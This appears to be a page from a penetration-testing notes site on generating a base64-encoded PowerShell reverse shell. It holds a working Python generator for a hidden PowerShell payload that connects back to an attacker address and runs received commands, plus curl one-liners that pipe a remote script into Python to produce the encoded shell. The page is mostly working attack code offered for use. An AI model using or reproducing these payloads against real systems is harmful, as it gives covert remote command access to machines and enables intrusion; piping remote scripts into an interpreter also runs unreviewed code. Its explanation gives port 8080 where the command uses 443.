PS Reverse Shell Python base64

Original Code:

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.118.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

Change IP and port according to need then save it and run.

Easy and shortcut way:

Below is simple and easy way to get the encoded shell.

curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 443 | xclip -selection clipboard

Explanation:

curl -s downloads the script from the URL quietly (-s suppresses progress messages).
The | pipes the output of curl directly to python3.
The - after python3 tells it to read from standard input.
$IP_KALI and 8080 are arguments passed to the script.

The below script is the same as above but it will just add "powershell -c" in the beginning.

echo 'powershell -c "'$(curl -s https://gist.githubusercontent.com/tothi/ab288fb523a4b32b51a53e542d40fe58/raw/40ade3fb5e3665b82310c08d36597123c2e75ab4/mkpsrevshell.py | python3 - $IP_KALI 443)'"' | xclip -selection clipboard

PreviousFTP enumeration NextDirectory Traversal

Last updated 12 months ago